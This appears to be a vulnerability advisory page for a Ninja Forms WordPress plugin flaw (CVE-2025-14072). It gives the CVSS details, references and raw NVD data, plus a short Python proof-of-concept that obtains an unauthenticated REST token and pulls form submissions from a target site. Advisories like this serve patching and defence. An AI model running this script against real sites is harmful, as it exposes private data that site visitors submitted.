CVE-2025-14072

Description

The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* - VULNERABLE

Ninja Forms < 3.13.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

target = 'http://target-wordpress-site.com'

# Step 1: Obtain access token via REST API
token_url = f'{target}/wp-json/ninja-forms/v1/access-token'
payload = {
    'form_id': 1
}
response = requests.post(token_url, json=payload)
token_data = response.json()
access_token = token_data.get('token')

# Step 2: Retrieve form submissions using token
submissions_url = f'{target}/wp-json/ninja-forms/v1/submissions'
headers = {'Authorization': f'Bearer {access_token}'}
response = requests.get(submissions_url, headers=headers)

print('Exfiltrated form submissions:')
print(json.dumps(response.json(), indent=2))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14072
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14072
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14072/
[4] VulDB https://vuldb.com/cve/CVE-2025-14072
[5] https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14072", "sourceIdentifier": "[email protected]", "published": "2026-01-02T06:15:53.627", "lastModified": "2026-01-09T13:58:47.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ninja Forms WordPress plugin before 3.13.3 allows unauthenticated attackers to generate valid access tokens via the REST API which can then be used to read form submissions."}, {"lang": "es", "value": "El plugin de WordPress Ninja Forms anterior a la versión 3.13.3 permite a atacantes no autenticados generar tokens de acceso válidos a través de la API REST, que luego pueden ser utilizados para leer envíos de formularios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.13.3", "matchCriteriaId": "E4B2BDF6-7FC1-4D62-9FDF-ABD8788530A8"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/4b19a333-eb19-4903-aa96-1fe871dd0f9f/", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}